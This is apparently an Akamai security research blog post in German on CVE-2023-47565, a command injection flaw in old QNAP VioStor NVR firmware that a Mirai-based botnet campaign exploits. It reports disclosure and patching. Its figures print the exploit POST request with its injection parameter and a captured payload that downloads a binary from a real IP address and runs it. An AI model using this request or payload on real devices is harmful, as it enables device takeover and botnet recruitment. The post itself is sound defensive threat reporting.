Sie sind an Cloud Computing interessiert? Legen Sie jetzt los

Aktiv ausgenutzte Schwachstelle in QNAP VioStor NVR: Behoben, Patches verfügbar

Akamai Wave Blue

Verfasser

Chad Seaman und Larry Cashdollar

December 14, 2023

Chad Seaman headshot

Verfasser

Chad Seaman

Chad Seaman ist Principal Security Researcher und Leiter des Security Intelligence Response Teams von Akamai. Er bezeichnet sich stolz als „Internet Dumpster Diver“ (zu Deutsch: Internet-Mülltaucher) und genießt es, die Abgründe zu erforschen, die er dort vorfindet. Chad begann seine Karriere als Programmierer und, nachdem er im Rahmen der Angriffsuntersuchung Sicherheits-, Exploit- und Forensik-Risiken ausgesetzt war, wurde Sicherheit schnell zu seiner bevorzugten Arbeit. Er verbringt seine Zeit nun mit der Untersuchung von Malware, Reverse Engineering, Schwachstellenforschung, DDoS-Analysen und Untersuchungen von Cyberkriminalität. Er fliegt gern Flugzeuge, schießt aus der Ferne Löcher in Papier und verbringt Zeit in der Natur, vorzugsweise im Wald auf seinem Dirtbike.

Larry Cashdollar

Verfasser

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Veraltete Systeme sind ein Nährboden für neue Schwachstellen, die erkannt und ausgenutzt werden können, um Malware zu verbreiten.

Zusammenfassung

  • Das Security Intelligence Response Team (SIRT) von Akamai hat ein zusätzliches Update zur InfectedSlurs-Kampagne veröffentlicht, da einer der betroffenen Anbieter wichtige Hinweise und Empfehlungen zur Verfügung gestellt hat. 

  • Die Schwachstelle in QNAP wurde im freien Internet entdeckt und erhielt die CVE-ID „CVE-2023-47565“ mit einem CVSS-v3-Score von 8,0.

  • Die im freien Internet erfassten bösartigen Payloads installieren eine Mirai-basierte Malware mit der Absicht, ein DDoS-Botnet (Distributed Denial of Service) zu erstellen.

  • Wir haben im ursprünglichen Beitrag eine umfangreiche Liste mit Indicators of Compromise (IOCs), Snort-Regeln und YARA-Regeln zur Identifizierung dieser Exploit-Versuche im freien Internet sowie möglicher aktiver Infektionen in geschützten Netzwerken bereitgestellt.

Was Sie wissen müssen

Im Rahmen der InfectedSlurs-Kampagne hat SIRT eine Sicherheitslücke in QNAP VioStor NVR-Geräten (Network Video Recorder) gefunden, die aktiv ausgenutzt wird. Das NVR-Gerät ist eine leistungsstarke Netzwerküberwachungslösung für die netzwerkbasierte Überwachung von IP-Kameras, Videoaufzeichnung, Wiedergabe und Remote-Datenzugriff. Der Sicherheitsanfälligkeit wurde die CVE-ID „CVE-2023-47565“ mit einem CVSS-v3-Score von 8,0 zugewiesen.

Die Sicherheitslücke ermöglicht es einem authentifizierten Angreifer, eine OS-Befehlsinjektion mit einer Payload zu erreichen, die über eine POST-Anfrage an die Verwaltungsschnittstelle gesendet wird. In seiner aktuellen Konfiguration setzt sie auf die Standardanmeldeinformationen des Geräts in den erfassten Payloads.

Die folgenden Versionen der QNAP VioStor NVR-Firmware sind betroffen:

  • VioStor NVR: Version 5.0.0 und früher (5.0.0 wurde am 21. Juni 2014 veröffentlicht)

QNAP hat den Support für diese Geräte bereits eingestellt, empfiehlt jedoch, die VioStor-Firmware auf bestehenden Geräten auf die neueste verfügbare Version zu aktualisieren. Dieses Problem wurde bereits gepatcht, obwohl es nie öffentlich gemeldet/offengelegt wurde. Darüber hinaus sollten Nutzer die Standardpasswörter auf ihren Geräten ändern.

Außerdem hat US-CERT einen Hinweis zur Schwachstelle veröffentlicht.

Beobachteter Exploit

Als wir während der InfectedSlurs-Kampagne Exploit-Payloads überprüften, entdeckten wir zunächst nur zwei Zero-Day-Schwachstellen, da das Team den beobachteten Exploit nicht mit einem bestimmten Gerät oder Hersteller verknüpfen konnte. Dadurch war es schwierig, die Zero-Day-Klassifizierung des Exploits zu bestätigen.

Nach einer gründlicheren Untersuchung verschiedener Aspekte der Exploits und Payloads vermutete das SIRT, dass QNAP VioStor NVR-Geräte das Ziel sein könnten. Diese Geräte entsprechen dem Zielgruppenprofil der Kampagne und wurden mit schwachen Standardanmeldedaten ausgeliefert (in ihren Handbüchern zu finden und im Exploit zu beobachten). Wie bei den ersten beiden Zero-Days konnten die infizierten Geräte eine OS-Befehlsinjektion in den NTP-Einstellungen der betroffenen IoT- und NVR-Geräten erleichtern.

Wir haben diese Theorien an US-CERT weitergeleitet, die sich mit dem Akamai SIRT und QNAP koordinierten, um die Beweise zu prüfen und die Theorien des SIRT zu bestätigen. Schließlich bestätigte QNAP, dass die Payloads auf ihre VioStor-Geräte abzielten, die bereits eingestellt und nicht mehr unterstützt werden. Es waren jedoch nur ältere Firmwareversionen (5.0.0 oder früher) betroffen.

Die Schwachstelle wird ausgenutzt, indem ein POST an den Pfad /cgi-bin/server/server.cgi gesendet wurde. Die Remote Code Execution (RCE) befindet sich an der Stelle, an der das Argument für SPECIFIC_SERVER angegeben ist (Abbildung 1).

  URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=

PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]

Abb. 1: Versuchte Ausnutzung des RCE über Command Injection

Abbildung 2 zeigt ein Beispiel für eine erfasste Infektions-Payload.

  wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86

Abb. 2: Erfasste RCE-Payload

Grundlegende Sicherheitspraktiken sind wichtig

Die Grundlagen sind wichtig. Diese Beobachtungen betonen erneut die Bedeutung grundlegender Best Practices für die Sicherheit, wie z. B. das Ändern von Standardpasswörtern auf Geräten während der Ersteinrichtung. Sie heben auch hervor, wie wichtig es ist, noch strengere langfristige, proaktive Sicherheitsprotokolle zu implementieren, z. B. eine konsistente Aktualisierung der Systeme zum Schutz vor potenziellen Angriffen, und dass die Systeme/Geräte gelegentlich überprüft werden müssen, insbesondere wenn sie ungewöhnliche Verhaltensweisen aufweisen.

Fazit

Auch hier haben wir durch unsere individuelle Bereitstellung von Honeypot-Netzwerken wertvolle Einblicke in Cyberangriffe gewonnen, die bisher unbekannte Schwachstellen aufdecken. Die Standardanmeldedaten und die veralteten, nicht mehr unterstützten Netzwerksysteme haben sich als Schwachstelle für Botnet-Infektionen erwiesen. Veraltete Systeme sind ein Nährboden für neue Schwachstellen, die erkannt und ausgenutzt werden können, um Malware zu verbreiten.

Dieses Ergebnis unterstreicht die entscheidende Bedeutung der Sensibilisierung und Schulung zu Best Practices für IoT-Geräte, wobei die damit verbundenen Risiken für den Verbraucher hervorgehoben werden. Doch es muss nicht nur bei den Verbrauchern Bewusstsein geschaffen werden, sondern auch bei den Herstellern dieser Geräte. Längere Software-Support-Zyklen und Sicherheit bei der Einrichtung, wie z. B. erzwungene Passwortänderungen, sind für die Aufrechterhaltung der Systemsicherheit von entscheidender Bedeutung.

Wir halten Sie auf dem Laufenden

Die Akamai Security Intelligence Group wird Bedrohungen wie diese weiterhin überwachen und darüber berichten, um bei unseren Kunden und in der Sicherheits-Community insgesamt das Bewusstsein für die Gefahren zu schärfen. Wenn sie mehr aus der Bedrohungsforschung erfahren möchten, folgen Sie uns auf X(ehemals Twitter). Dort informieren wir über unsere neuesten Erkenntnisse.

Das Akamai SIRT dankt CISA, US-CERT und QNAP herzlich für ihre Unterstützung bei der Kommunikation, Koordination, Identifizierung, Behebung und Offenlegung..



Akamai Wave Blue

Verfasser

Chad Seaman und Larry Cashdollar

December 14, 2023

Chad Seaman headshot

Verfasser

Chad Seaman

Chad Seaman ist Principal Security Researcher und Leiter des Security Intelligence Response Teams von Akamai. Er bezeichnet sich stolz als „Internet Dumpster Diver“ (zu Deutsch: Internet-Mülltaucher) und genießt es, die Abgründe zu erforschen, die er dort vorfindet. Chad begann seine Karriere als Programmierer und, nachdem er im Rahmen der Angriffsuntersuchung Sicherheits-, Exploit- und Forensik-Risiken ausgesetzt war, wurde Sicherheit schnell zu seiner bevorzugten Arbeit. Er verbringt seine Zeit nun mit der Untersuchung von Malware, Reverse Engineering, Schwachstellenforschung, DDoS-Analysen und Untersuchungen von Cyberkriminalität. Er fliegt gern Flugzeuge, schießt aus der Ferne Löcher in Papier und verbringt Zeit in der Natur, vorzugsweise im Wald auf seinem Dirtbike.

Larry Cashdollar

Verfasser

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.